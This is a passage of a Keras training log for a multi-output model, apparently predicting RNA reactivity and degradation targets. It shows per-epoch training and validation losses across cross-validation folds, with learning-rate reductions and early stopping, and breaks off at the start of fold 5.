120/120 - 7s - loss: 4.1864 - output_react_loss: 0.4506 - output_bg_ph_loss: 0.4808 - output_ph_loss: 0.7000 - output_mg_c_loss: 0.4885 - output_c_loss: 0.6466 - val_loss: 4.4873 - val_output_react_loss: 0.5233 - val_output_bg_ph_loss: 0.6486 - val_output_ph_loss: 0.6018 - val_output_mg_c_loss: 0.5162 - val_output_c_loss: 0.5093
Epoch 33/70
120/120 - 7s - loss: 4.0855 - output_react_loss: 0.4382 - output_bg_ph_loss: 0.4705 - output_ph_loss: 0.6808 - output_mg_c_loss: 0.4763 - output_c_loss: 0.6347 - val_loss: 4.4754 - val_output_react_loss: 0.5233 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6000 - val_output_mg_c_loss: 0.5147 - val_output_c_loss: 0.5069
Epoch 34/70
120/120 - 7s - loss: 4.2179 - output_react_loss: 0.4546 - output_bg_ph_loss: 0.4770 - output_ph_loss: 0.7134 - output_mg_c_loss: 0.4834 - output_c_loss: 0.6746 - val_loss: 4.4678 - val_output_react_loss: 0.5224 - val_output_bg_ph_loss: 0.6447 - val_output_ph_loss: 0.5986 - val_output_mg_c_loss: 0.5139 - val_output_c_loss: 0.5071
Epoch 35/70
120/120 - 8s - loss: 4.0815 - output_react_loss: 0.4387 - output_bg_ph_loss: 0.4625 - output_ph_loss: 0.6882 - output_mg_c_loss: 0.4749 - output_c_loss: 0.6413 - val_loss: 4.4744 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6451 - val_output_ph_loss: 0.6008 - val_output_mg_c_loss: 0.5145 - val_output_c_loss: 0.5086
Epoch 36/70
120/120 - 7s - loss: 3.9169 - output_react_loss: 0.4280 - output_bg_ph_loss: 0.4465 - output_ph_loss: 0.6464 - output_mg_c_loss: 0.4512 - output_c_loss: 0.6190 - val_loss: 4.4753 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.5999 - val_output_mg_c_loss: 0.5151 - val_output_c_loss: 0.5068
Epoch 37/70
120/120 - 7s - loss: 4.0919 - output_react_loss: 0.4353 - output_bg_ph_loss: 0.4631 - output_ph_loss: 0.6960 - output_mg_c_loss: 0.4765 - output_c_loss: 0.6463 - val_loss: 4.4893 - val_output_react_loss: 0.5247 - val_output_bg_ph_loss: 0.6476 - val_output_ph_loss: 0.6019 - val_output_mg_c_loss: 0.5167 - val_output_c_loss: 0.5095
Epoch 38/70
120/120 - 7s - loss: 4.0659 - output_react_loss: 0.4359 - output_bg_ph_loss: 0.4577 - output_ph_loss: 0.6921 - output_mg_c_loss: 0.4670 - output_c_loss: 0.6526 - val_loss: 4.4675 - val_output_react_loss: 0.5223 - val_output_bg_ph_loss: 0.6447 - val_output_ph_loss: 0.5998 - val_output_mg_c_loss: 0.5130 - val_output_c_loss: 0.5076
Epoch 39/70
120/120 - 8s - loss: 4.0875 - output_react_loss: 0.4352 - output_bg_ph_loss: 0.4633 - output_ph_loss: 0.6898 - output_mg_c_loss: 0.4738 - output_c_loss: 0.6533 - val_loss: 4.4727 - val_output_react_loss: 0.5232 - val_output_bg_ph_loss: 0.6451 - val_output_ph_loss: 0.6003 - val_output_mg_c_loss: 0.5138 - val_output_c_loss: 0.5081
Epoch 40/70
120/120 - 7s - loss: 4.0767 - output_react_loss: 0.4371 - output_bg_ph_loss: 0.4611 - output_ph_loss: 0.6976 - output_mg_c_loss: 0.4693 - output_c_loss: 0.6442 - val_loss: 4.4739 - val_output_react_loss: 0.5230 - val_output_bg_ph_loss: 0.6453 - val_output_ph_loss: 0.5995 - val_output_mg_c_loss: 0.5148 - val_output_c_loss: 0.5082
Epoch 41/70
120/120 - 7s - loss: 3.8735 - output_react_loss: 0.4178 - output_bg_ph_loss: 0.4458 - output_ph_loss: 0.6334 - output_mg_c_loss: 0.4508 - output_c_loss: 0.6114 - val_loss: 4.4756 - val_output_react_loss: 0.5230 - val_output_bg_ph_loss: 0.6461 - val_output_ph_loss: 0.6011 - val_output_mg_c_loss: 0.5138 - val_output_c_loss: 0.5086
Epoch 42/70
120/120 - 7s - loss: 4.1327 - output_react_loss: 0.4404 - output_bg_ph_loss: 0.4608 - output_ph_loss: 0.7110 - output_mg_c_loss: 0.4753 - output_c_loss: 0.6686 - val_loss: 4.4778 - val_output_react_loss: 0.5237 - val_output_bg_ph_loss: 0.6473 - val_output_ph_loss: 0.6004 - val_output_mg_c_loss: 0.5139 - val_output_c_loss: 0.5076
Epoch 43/70
Epoch 00043: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05.
120/120 - 8s - loss: 3.9421 - output_react_loss: 0.4257 - output_bg_ph_loss: 0.4502 - output_ph_loss: 0.6623 - output_mg_c_loss: 0.4530 - output_c_loss: 0.6219 - val_loss: 4.4769 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6462 - val_output_ph_loss: 0.6005 - val_output_mg_c_loss: 0.5155 - val_output_c_loss: 0.5072
Epoch 44/70
120/120 - 7s - loss: 3.9330 - output_react_loss: 0.4210 - output_bg_ph_loss: 0.4489 - output_ph_loss: 0.6522 - output_mg_c_loss: 0.4536 - output_c_loss: 0.6336 - val_loss: 4.4741 - val_output_react_loss: 0.5232 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.6005 - val_output_mg_c_loss: 0.5140 - val_output_c_loss: 0.5073
Epoch 45/70
120/120 - 7s - loss: 4.0963 - output_react_loss: 0.4412 - output_bg_ph_loss: 0.4577 - output_ph_loss: 0.6950 - output_mg_c_loss: 0.4753 - output_c_loss: 0.6529 - val_loss: 4.4739 - val_output_react_loss: 0.5230 - val_output_bg_ph_loss: 0.6461 - val_output_ph_loss: 0.5999 - val_output_mg_c_loss: 0.5141 - val_output_c_loss: 0.5075
Epoch 46/70
120/120 - 7s - loss: 4.0753 - output_react_loss: 0.4336 - output_bg_ph_loss: 0.4550 - output_ph_loss: 0.7005 - output_mg_c_loss: 0.4690 - output_c_loss: 0.6598 - val_loss: 4.4747 - val_output_react_loss: 0.5229 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6005 - val_output_mg_c_loss: 0.5142 - val_output_c_loss: 0.5074
Epoch 47/70
120/120 - 7s - loss: 3.9274 - output_react_loss: 0.4214 - output_bg_ph_loss: 0.4449 - output_ph_loss: 0.6641 - output_mg_c_loss: 0.4539 - output_c_loss: 0.6230 - val_loss: 4.4726 - val_output_react_loss: 0.5228 - val_output_bg_ph_loss: 0.6461 - val_output_ph_loss: 0.6000 - val_output_mg_c_loss: 0.5139 - val_output_c_loss: 0.5071
Epoch 48/70
Restoring model weights from the end of the best epoch.
Epoch 00048: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06.
120/120 - 7s - loss: 3.9150 - output_react_loss: 0.4156 - output_bg_ph_loss: 0.4457 - output_ph_loss: 0.6547 - output_mg_c_loss: 0.4567 - output_c_loss: 0.6243 - val_loss: 4.4713 - val_output_react_loss: 0.5225 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.5998 - val_output_mg_c_loss: 0.5137 - val_output_c_loss: 0.5070
Epoch 00048: early stopping
FOLD: 4
Epoch 1/70
120/120 - 9s - loss: 8.8906 - output_react_loss: 0.9509 - output_bg_ph_loss: 1.1470 - output_ph_loss: 1.3217 - output_mg_c_loss: 1.1242 - output_c_loss: 1.1248 - val_loss: 6.7099 - val_output_react_loss: 0.7702 - val_output_bg_ph_loss: 0.9436 - val_output_ph_loss: 0.8752 - val_output_mg_c_loss: 0.8307 - val_output_c_loss: 0.7457
Epoch 2/70
120/120 - 7s - loss: 7.7552 - output_react_loss: 0.8208 - output_bg_ph_loss: 0.9754 - output_ph_loss: 1.1669 - output_mg_c_loss: 0.9870 - output_c_loss: 1.0217 - val_loss: 6.1518 - val_output_react_loss: 0.7047 - val_output_bg_ph_loss: 0.8679 - val_output_ph_loss: 0.8045 - val_output_mg_c_loss: 0.7560 - val_output_c_loss: 0.6901
Epoch 3/70
120/120 - 7s - loss: 7.1821 - output_react_loss: 0.7753 - output_bg_ph_loss: 0.8991 - output_ph_loss: 1.1080 - output_mg_c_loss: 0.8939 - output_c_loss: 0.9375 - val_loss: 5.6383 - val_output_react_loss: 0.6550 - val_output_bg_ph_loss: 0.7970 - val_output_ph_loss: 0.7564 - val_output_mg_c_loss: 0.6784 - val_output_c_loss: 0.6212
Epoch 4/70
120/120 - 7s - loss: 6.7289 - output_react_loss: 0.7362 - output_bg_ph_loss: 0.8336 - output_ph_loss: 1.0447 - output_mg_c_loss: 0.8225 - output_c_loss: 0.8995 - val_loss: 5.2977 - val_output_react_loss: 0.6334 - val_output_bg_ph_loss: 0.7465 - val_output_ph_loss: 0.6968 - val_output_mg_c_loss: 0.6302 - val_output_c_loss: 0.5807
Epoch 5/70
120/120 - 7s - loss: 6.4910 - output_react_loss: 0.7190 - output_bg_ph_loss: 0.8051 - output_ph_loss: 0.9983 - output_mg_c_loss: 0.7908 - output_c_loss: 0.8628 - val_loss: 5.2019 - val_output_react_loss: 0.6135 - val_output_bg_ph_loss: 0.7289 - val_output_ph_loss: 0.6880 - val_output_mg_c_loss: 0.6272 - val_output_c_loss: 0.5747
Epoch 6/70
120/120 - 7s - loss: 6.1684 - output_react_loss: 0.6897 - output_bg_ph_loss: 0.7635 - output_ph_loss: 0.9449 - output_mg_c_loss: 0.7468 - output_c_loss: 0.8238 - val_loss: 5.0363 - val_output_react_loss: 0.5998 - val_output_bg_ph_loss: 0.7134 - val_output_ph_loss: 0.6642 - val_output_mg_c_loss: 0.5947 - val_output_c_loss: 0.5563
Epoch 7/70
120/120 - 7s - loss: 6.2087 - output_react_loss: 0.6861 - output_bg_ph_loss: 0.7609 - output_ph_loss: 0.9620 - output_mg_c_loss: 0.7543 - output_c_loss: 0.8441 - val_loss: 5.0750 - val_output_react_loss: 0.6034 - val_output_bg_ph_loss: 0.7020 - val_output_ph_loss: 0.6790 - val_output_mg_c_loss: 0.6142 - val_output_c_loss: 0.5569
Epoch 8/70
120/120 - 7s - loss: 6.0125 - output_react_loss: 0.6668 - output_bg_ph_loss: 0.7439 - output_ph_loss: 0.9281 - output_mg_c_loss: 0.7213 - output_c_loss: 0.8205 - val_loss: 4.8987 - val_output_react_loss: 0.5870 - val_output_bg_ph_loss: 0.6898 - val_output_ph_loss: 0.6503 - val_output_mg_c_loss: 0.5736 - val_output_c_loss: 0.5477
Epoch 9/70
120/120 - 7s - loss: 5.6743 - output_react_loss: 0.6340 - output_bg_ph_loss: 0.6979 - output_ph_loss: 0.8804 - output_mg_c_loss: 0.6772 - output_c_loss: 0.7756 - val_loss: 4.8440 - val_output_react_loss: 0.5786 - val_output_bg_ph_loss: 0.6811 - val_output_ph_loss: 0.6374 - val_output_mg_c_loss: 0.5707 - val_output_c_loss: 0.5456
Epoch 10/70
120/120 - 7s - loss: 5.8360 - output_react_loss: 0.6532 - output_bg_ph_loss: 0.6981 - output_ph_loss: 0.9233 - output_mg_c_loss: 0.6985 - output_c_loss: 0.8132 - val_loss: 4.8348 - val_output_react_loss: 0.5791 - val_output_bg_ph_loss: 0.6826 - val_output_ph_loss: 0.6364 - val_output_mg_c_loss: 0.5702 - val_output_c_loss: 0.5346
Epoch 11/70
120/120 - 7s - loss: 5.5673 - output_react_loss: 0.6177 - output_bg_ph_loss: 0.6746 - output_ph_loss: 0.8888 - output_mg_c_loss: 0.6622 - output_c_loss: 0.7693 - val_loss: 4.7333 - val_output_react_loss: 0.5694 - val_output_bg_ph_loss: 0.6625 - val_output_ph_loss: 0.6226 - val_output_mg_c_loss: 0.5564 - val_output_c_loss: 0.5340
Epoch 12/70
120/120 - 7s - loss: 5.5214 - output_react_loss: 0.6199 - output_bg_ph_loss: 0.6635 - output_ph_loss: 0.8765 - output_mg_c_loss: 0.6528 - output_c_loss: 0.7725 - val_loss: 4.8059 - val_output_react_loss: 0.5627 - val_output_bg_ph_loss: 0.6731 - val_output_ph_loss: 0.6371 - val_output_mg_c_loss: 0.5799 - val_output_c_loss: 0.5374
Epoch 13/70
120/120 - 7s - loss: 5.3062 - output_react_loss: 0.5977 - output_bg_ph_loss: 0.6392 - output_ph_loss: 0.8410 - output_mg_c_loss: 0.6230 - output_c_loss: 0.7454 - val_loss: 4.7326 - val_output_react_loss: 0.5585 - val_output_bg_ph_loss: 0.6626 - val_output_ph_loss: 0.6208 - val_output_mg_c_loss: 0.5681 - val_output_c_loss: 0.5334
Epoch 14/70
120/120 - 7s - loss: 5.2454 - output_react_loss: 0.5833 - output_bg_ph_loss: 0.6234 - output_ph_loss: 0.8391 - output_mg_c_loss: 0.6176 - output_c_loss: 0.7576 - val_loss: 4.7426 - val_output_react_loss: 0.5517 - val_output_bg_ph_loss: 0.6679 - val_output_ph_loss: 0.6287 - val_output_mg_c_loss: 0.5702 - val_output_c_loss: 0.5343
Epoch 15/70
120/120 - 7s - loss: 5.2718 - output_react_loss: 0.5885 - output_bg_ph_loss: 0.6244 - output_ph_loss: 0.8461 - output_mg_c_loss: 0.6164 - output_c_loss: 0.7671 - val_loss: 4.6895 - val_output_react_loss: 0.5530 - val_output_bg_ph_loss: 0.6561 - val_output_ph_loss: 0.6196 - val_output_mg_c_loss: 0.5603 - val_output_c_loss: 0.5311
Epoch 16/70
120/120 - 8s - loss: 5.0568 - output_react_loss: 0.5666 - output_bg_ph_loss: 0.6042 - output_ph_loss: 0.8064 - output_mg_c_loss: 0.5917 - output_c_loss: 0.7252 - val_loss: 4.7229 - val_output_react_loss: 0.5603 - val_output_bg_ph_loss: 0.6592 - val_output_ph_loss: 0.6172 - val_output_mg_c_loss: 0.5682 - val_output_c_loss: 0.5303
Epoch 17/70
120/120 - 7s - loss: 5.1108 - output_react_loss: 0.5676 - output_bg_ph_loss: 0.6043 - output_ph_loss: 0.8302 - output_mg_c_loss: 0.5973 - output_c_loss: 0.7422 - val_loss: 4.6748 - val_output_react_loss: 0.5490 - val_output_bg_ph_loss: 0.6577 - val_output_ph_loss: 0.6220 - val_output_mg_c_loss: 0.5537 - val_output_c_loss: 0.5321
Epoch 18/70
120/120 - 7s - loss: 4.8097 - output_react_loss: 0.5327 - output_bg_ph_loss: 0.5670 - output_ph_loss: 0.7759 - output_mg_c_loss: 0.5630 - output_c_loss: 0.7083 - val_loss: 4.6194 - val_output_react_loss: 0.5420 - val_output_bg_ph_loss: 0.6526 - val_output_ph_loss: 0.6067 - val_output_mg_c_loss: 0.5501 - val_output_c_loss: 0.5233
Epoch 19/70
120/120 - 7s - loss: 4.9436 - output_react_loss: 0.5502 - output_bg_ph_loss: 0.5810 - output_ph_loss: 0.8112 - output_mg_c_loss: 0.5720 - output_c_loss: 0.7258 - val_loss: 4.6665 - val_output_react_loss: 0.5566 - val_output_bg_ph_loss: 0.6545 - val_output_ph_loss: 0.6094 - val_output_mg_c_loss: 0.5533 - val_output_c_loss: 0.5283
Epoch 20/70
120/120 - 7s - loss: 4.7871 - output_react_loss: 0.5290 - output_bg_ph_loss: 0.5616 - output_ph_loss: 0.7727 - output_mg_c_loss: 0.5615 - output_c_loss: 0.7103 - val_loss: 4.7063 - val_output_react_loss: 0.5511 - val_output_bg_ph_loss: 0.6634 - val_output_ph_loss: 0.6159 - val_output_mg_c_loss: 0.5631 - val_output_c_loss: 0.5352
Epoch 21/70
120/120 - 7s - loss: 4.7750 - output_react_loss: 0.5299 - output_bg_ph_loss: 0.5580 - output_ph_loss: 0.7771 - output_mg_c_loss: 0.5590 - output_c_loss: 0.7043 - val_loss: 4.6158 - val_output_react_loss: 0.5455 - val_output_bg_ph_loss: 0.6464 - val_output_ph_loss: 0.6079 - val_output_mg_c_loss: 0.5490 - val_output_c_loss: 0.5261
Epoch 22/70
120/120 - 7s - loss: 4.7371 - output_react_loss: 0.5229 - output_bg_ph_loss: 0.5488 - output_ph_loss: 0.7858 - output_mg_c_loss: 0.5513 - output_c_loss: 0.7053 - val_loss: 4.5994 - val_output_react_loss: 0.5457 - val_output_bg_ph_loss: 0.6436 - val_output_ph_loss: 0.6061 - val_output_mg_c_loss: 0.5459 - val_output_c_loss: 0.5226
Epoch 23/70
120/120 - 7s - loss: 4.7746 - output_react_loss: 0.5235 - output_bg_ph_loss: 0.5509 - output_ph_loss: 0.8001 - output_mg_c_loss: 0.5547 - output_c_loss: 0.7163 - val_loss: 4.6118 - val_output_react_loss: 0.5429 - val_output_bg_ph_loss: 0.6521 - val_output_ph_loss: 0.6054 - val_output_mg_c_loss: 0.5466 - val_output_c_loss: 0.5232
Epoch 24/70
120/120 - 7s - loss: 4.6363 - output_react_loss: 0.5124 - output_bg_ph_loss: 0.5353 - output_ph_loss: 0.7584 - output_mg_c_loss: 0.5383 - output_c_loss: 0.7059 - val_loss: 4.6217 - val_output_react_loss: 0.5505 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.6066 - val_output_mg_c_loss: 0.5480 - val_output_c_loss: 0.5262
Epoch 25/70
120/120 - 7s - loss: 4.4305 - output_react_loss: 0.4869 - output_bg_ph_loss: 0.5133 - output_ph_loss: 0.7272 - output_mg_c_loss: 0.5132 - output_c_loss: 0.6766 - val_loss: 4.6304 - val_output_react_loss: 0.5475 - val_output_bg_ph_loss: 0.6499 - val_output_ph_loss: 0.6096 - val_output_mg_c_loss: 0.5507 - val_output_c_loss: 0.5246
Epoch 26/70
120/120 - 7s - loss: 4.6461 - output_react_loss: 0.5099 - output_bg_ph_loss: 0.5270 - output_ph_loss: 0.7788 - output_mg_c_loss: 0.5405 - output_c_loss: 0.7126 - val_loss: 4.6105 - val_output_react_loss: 0.5441 - val_output_bg_ph_loss: 0.6435 - val_output_ph_loss: 0.6049 - val_output_mg_c_loss: 0.5536 - val_output_c_loss: 0.5232
Epoch 27/70
Epoch 00027: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513.
120/120 - 7s - loss: 4.4508 - output_react_loss: 0.4865 - output_bg_ph_loss: 0.5154 - output_ph_loss: 0.7393 - output_mg_c_loss: 0.5180 - output_c_loss: 0.6718 - val_loss: 4.6236 - val_output_react_loss: 0.5541 - val_output_bg_ph_loss: 0.6424 - val_output_ph_loss: 0.6128 - val_output_mg_c_loss: 0.5445 - val_output_c_loss: 0.5288
Epoch 28/70
120/120 - 7s - loss: 4.3974 - output_react_loss: 0.4782 - output_bg_ph_loss: 0.4922 - output_ph_loss: 0.7485 - output_mg_c_loss: 0.5110 - output_c_loss: 0.6862 - val_loss: 4.5277 - val_output_react_loss: 0.5392 - val_output_bg_ph_loss: 0.6349 - val_output_ph_loss: 0.5967 - val_output_mg_c_loss: 0.5348 - val_output_c_loss: 0.5133
Epoch 29/70
120/120 - 7s - loss: 4.1935 - output_react_loss: 0.4579 - output_bg_ph_loss: 0.4789 - output_ph_loss: 0.7002 - output_mg_c_loss: 0.4823 - output_c_loss: 0.6551 - val_loss: 4.5286 - val_output_react_loss: 0.5375 - val_output_bg_ph_loss: 0.6356 - val_output_ph_loss: 0.5949 - val_output_mg_c_loss: 0.5363 - val_output_c_loss: 0.5150
Epoch 30/70
120/120 - 7s - loss: 4.3716 - output_react_loss: 0.4728 - output_bg_ph_loss: 0.4947 - output_ph_loss: 0.7368 - output_mg_c_loss: 0.5026 - output_c_loss: 0.6945 - val_loss: 4.5206 - val_output_react_loss: 0.5371 - val_output_bg_ph_loss: 0.6341 - val_output_ph_loss: 0.5940 - val_output_mg_c_loss: 0.5356 - val_output_c_loss: 0.5130
Epoch 31/70
120/120 - 7s - loss: 4.2824 - output_react_loss: 0.4612 - output_bg_ph_loss: 0.4877 - output_ph_loss: 0.7328 - output_mg_c_loss: 0.4905 - output_c_loss: 0.6709 - val_loss: 4.5204 - val_output_react_loss: 0.5369 - val_output_bg_ph_loss: 0.6333 - val_output_ph_loss: 0.5948 - val_output_mg_c_loss: 0.5358 - val_output_c_loss: 0.5135
Epoch 32/70
120/120 - 8s - loss: 4.2224 - output_react_loss: 0.4580 - output_bg_ph_loss: 0.4723 - output_ph_loss: 0.7178 - output_mg_c_loss: 0.4889 - output_c_loss: 0.6664 - val_loss: 4.5124 - val_output_react_loss: 0.5360 - val_output_bg_ph_loss: 0.6326 - val_output_ph_loss: 0.5944 - val_output_mg_c_loss: 0.5338 - val_output_c_loss: 0.5131
Epoch 33/70
120/120 - 7s - loss: 4.1067 - output_react_loss: 0.4443 - output_bg_ph_loss: 0.4693 - output_ph_loss: 0.6871 - output_mg_c_loss: 0.4744 - output_c_loss: 0.6434 - val_loss: 4.5215 - val_output_react_loss: 0.5368 - val_output_bg_ph_loss: 0.6340 - val_output_ph_loss: 0.5943 - val_output_mg_c_loss: 0.5360 - val_output_c_loss: 0.5134
Epoch 34/70
120/120 - 7s - loss: 4.3377 - output_react_loss: 0.4678 - output_bg_ph_loss: 0.4812 - output_ph_loss: 0.7438 - output_mg_c_loss: 0.5043 - output_c_loss: 0.6874 - val_loss: 4.5075 - val_output_react_loss: 0.5353 - val_output_bg_ph_loss: 0.6321 - val_output_ph_loss: 0.5934 - val_output_mg_c_loss: 0.5333 - val_output_c_loss: 0.5126
Epoch 35/70
120/120 - 7s - loss: 4.1034 - output_react_loss: 0.4508 - output_bg_ph_loss: 0.4664 - output_ph_loss: 0.6807 - output_mg_c_loss: 0.4690 - output_c_loss: 0.6503 - val_loss: 4.5226 - val_output_react_loss: 0.5381 - val_output_bg_ph_loss: 0.6328 - val_output_ph_loss: 0.5957 - val_output_mg_c_loss: 0.5356 - val_output_c_loss: 0.5138
Epoch 36/70
120/120 - 7s - loss: 4.0701 - output_react_loss: 0.4452 - output_bg_ph_loss: 0.4590 - output_ph_loss: 0.6904 - output_mg_c_loss: 0.4662 - output_c_loss: 0.6389 - val_loss: 4.5138 - val_output_react_loss: 0.5366 - val_output_bg_ph_loss: 0.6316 - val_output_ph_loss: 0.5939 - val_output_mg_c_loss: 0.5347 - val_output_c_loss: 0.5142
Epoch 37/70
120/120 - 7s - loss: 4.2783 - output_react_loss: 0.4575 - output_bg_ph_loss: 0.4774 - output_ph_loss: 0.7434 - output_mg_c_loss: 0.4942 - output_c_loss: 0.6767 - val_loss: 4.5133 - val_output_react_loss: 0.5361 - val_output_bg_ph_loss: 0.6321 - val_output_ph_loss: 0.5935 - val_output_mg_c_loss: 0.5350 - val_output_c_loss: 0.5134
Epoch 38/70
120/120 - 7s - loss: 4.2156 - output_react_loss: 0.4574 - output_bg_ph_loss: 0.4655 - output_ph_loss: 0.7182 - output_mg_c_loss: 0.4864 - output_c_loss: 0.6788 - val_loss: 4.5101 - val_output_react_loss: 0.5351 - val_output_bg_ph_loss: 0.6316 - val_output_ph_loss: 0.5937 - val_output_mg_c_loss: 0.5346 - val_output_c_loss: 0.5137
Epoch 39/70
Epoch 00039: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05.
120/120 - 7s - loss: 4.2040 - output_react_loss: 0.4570 - output_bg_ph_loss: 0.4739 - output_ph_loss: 0.7226 - output_mg_c_loss: 0.4780 - output_c_loss: 0.6635 - val_loss: 4.5177 - val_output_react_loss: 0.5363 - val_output_bg_ph_loss: 0.6332 - val_output_ph_loss: 0.5938 - val_output_mg_c_loss: 0.5352 - val_output_c_loss: 0.5148
Epoch 40/70
120/120 - 8s - loss: 4.0879 - output_react_loss: 0.4409 - output_bg_ph_loss: 0.4636 - output_ph_loss: 0.6944 - output_mg_c_loss: 0.4676 - output_c_loss: 0.6492 - val_loss: 4.5065 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6315 - val_output_ph_loss: 0.5929 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5133
Epoch 41/70
120/120 - 7s - loss: 4.1062 - output_react_loss: 0.4419 - output_bg_ph_loss: 0.4591 - output_ph_loss: 0.6918 - output_mg_c_loss: 0.4792 - output_c_loss: 0.6540 - val_loss: 4.5043 - val_output_react_loss: 0.5353 - val_output_bg_ph_loss: 0.6310 - val_output_ph_loss: 0.5925 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5130
Epoch 42/70
120/120 - 7s - loss: 4.1679 - output_react_loss: 0.4495 - output_bg_ph_loss: 0.4657 - output_ph_loss: 0.7240 - output_mg_c_loss: 0.4719 - output_c_loss: 0.6699 - val_loss: 4.5072 - val_output_react_loss: 0.5356 - val_output_bg_ph_loss: 0.6314 - val_output_ph_loss: 0.5929 - val_output_mg_c_loss: 0.5335 - val_output_c_loss: 0.5132
Epoch 43/70
120/120 - 7s - loss: 4.0446 - output_react_loss: 0.4416 - output_bg_ph_loss: 0.4594 - output_ph_loss: 0.6716 - output_mg_c_loss: 0.4668 - output_c_loss: 0.6375 - val_loss: 4.5044 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6309 - val_output_ph_loss: 0.5925 - val_output_mg_c_loss: 0.5328 - val_output_c_loss: 0.5135
Epoch 44/70
120/120 - 7s - loss: 4.1571 - output_react_loss: 0.4519 - output_bg_ph_loss: 0.4633 - output_ph_loss: 0.7157 - output_mg_c_loss: 0.4768 - output_c_loss: 0.6574 - val_loss: 4.5038 - val_output_react_loss: 0.5351 - val_output_bg_ph_loss: 0.6309 - val_output_ph_loss: 0.5927 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5129
Epoch 45/70
120/120 - 7s - loss: 4.1190 - output_react_loss: 0.4399 - output_bg_ph_loss: 0.4596 - output_ph_loss: 0.7120 - output_mg_c_loss: 0.4726 - output_c_loss: 0.6628 - val_loss: 4.5050 - val_output_react_loss: 0.5356 - val_output_bg_ph_loss: 0.6307 - val_output_ph_loss: 0.5928 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5133
Epoch 46/70
120/120 - 7s - loss: 4.1904 - output_react_loss: 0.4496 - output_bg_ph_loss: 0.4695 - output_ph_loss: 0.7201 - output_mg_c_loss: 0.4816 - output_c_loss: 0.6688 - val_loss: 4.5056 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6312 - val_output_ph_loss: 0.5926 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5127
Epoch 47/70
120/120 - 7s - loss: 4.2432 - output_react_loss: 0.4606 - output_bg_ph_loss: 0.4745 - output_ph_loss: 0.7277 - output_mg_c_loss: 0.4862 - output_c_loss: 0.6731 - val_loss: 4.5064 - val_output_react_loss: 0.5358 - val_output_bg_ph_loss: 0.6310 - val_output_ph_loss: 0.5928 - val_output_mg_c_loss: 0.5336 - val_output_c_loss: 0.5129
Epoch 48/70
120/120 - 7s - loss: 3.9354 - output_react_loss: 0.4218 - output_bg_ph_loss: 0.4448 - output_ph_loss: 0.6639 - output_mg_c_loss: 0.4552 - output_c_loss: 0.6279 - val_loss: 4.5060 - val_output_react_loss: 0.5354 - val_output_bg_ph_loss: 0.6312 - val_output_ph_loss: 0.5927 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5136
Epoch 49/70
Epoch 00049: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06.
120/120 - 7s - loss: 4.1410 - output_react_loss: 0.4473 - output_bg_ph_loss: 0.4629 - output_ph_loss: 0.7069 - output_mg_c_loss: 0.4758 - output_c_loss: 0.6621 - val_loss: 4.5057 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5130
Epoch 50/70
120/120 - 7s - loss: 4.0535 - output_react_loss: 0.4465 - output_bg_ph_loss: 0.4524 - output_ph_loss: 0.6915 - output_mg_c_loss: 0.4633 - output_c_loss: 0.6376 - val_loss: 4.5066 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6312 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5132
Epoch 51/70
120/120 - 7s - loss: 4.1506 - output_react_loss: 0.4464 - output_bg_ph_loss: 0.4638 - output_ph_loss: 0.7097 - output_mg_c_loss: 0.4765 - output_c_loss: 0.6675 - val_loss: 4.5061 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5133
Epoch 52/70
120/120 - 7s - loss: 4.1188 - output_react_loss: 0.4439 - output_bg_ph_loss: 0.4648 - output_ph_loss: 0.6971 - output_mg_c_loss: 0.4718 - output_c_loss: 0.6607 - val_loss: 4.5057 - val_output_react_loss: 0.5356 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5132
Epoch 53/70
120/120 - 7s - loss: 4.1722 - output_react_loss: 0.4500 - output_bg_ph_loss: 0.4646 - output_ph_loss: 0.7128 - output_mg_c_loss: 0.4809 - output_c_loss: 0.6685 - val_loss: 4.5053 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6310 - val_output_ph_loss: 0.5929 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5132
Epoch 54/70
Restoring model weights from the end of the best epoch.
Epoch 00054: ReduceLROnPlateau reducing learning rate to 1.0000001111620805e-07.
120/120 - 7s - loss: 4.1012 - output_react_loss: 0.4457 - output_bg_ph_loss: 0.4583 - output_ph_loss: 0.7053 - output_mg_c_loss: 0.4713 - output_c_loss: 0.6452 - val_loss: 4.5060 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5333 - val_output_c_loss: 0.5132
Epoch 00054: early stopping
FOLD: 5
Epoch 1/70
